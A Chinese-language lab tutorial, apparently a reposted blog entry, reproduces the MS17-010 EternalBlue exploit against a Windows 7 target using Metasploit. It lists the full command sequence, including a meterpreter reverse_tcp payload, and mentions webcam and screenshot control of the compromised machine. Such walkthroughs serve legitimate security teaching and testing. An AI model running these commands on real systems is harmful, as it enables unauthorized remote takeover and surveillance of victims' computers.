首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

MS17-010漏洞利用复现

MS17-010漏洞利用复现

漏洞描述

Eternalblue永恒之蓝漏洞通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,使用恶意代码会扫描开放445文件共享端口的Windows机器,因为该漏洞无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

复现环境

攻击机:Kali-Linux-2018 IP:172.17.129.54

靶机:win7 x64 IP:172.17.129.58

漏洞利用

首先攻击机和靶机需要网络相同

随后我们开启数据库,这样我们在搜索攻击模块时会很快,而且你此次的渗透数据还可以保存到数据库中。

数据库和metasploit开启命令如下

service postgresql start //开启数据库

msfconsole

使用搜索命令,搜索ms17_010

search ms17_010

使用攻击模块

use exploit/windows/smb/ms17_010_eternalblue

查看所需要的配置

show options

然后开始配置payload、渗透(靶机)地址、监听地址(攻击)

set payload windows/x64/meterpreter/reverse_tcp

set rhost x.x.x.x //设置目标主机IP

set lhost x.x.x.x //设置本机主机IP

开始攻击输入exploit

exploit

此时我们已经通过勒索漏洞控制了该电脑,拿下了dos命令,同时meterpreter中有很多命令可用,如打开摄像头,截图等命令可用,如下图的演示截图客户机

本次演示到此结束,请及时关注我们

企鹅号:Tsg技术分享

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20190926A0RZUI00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券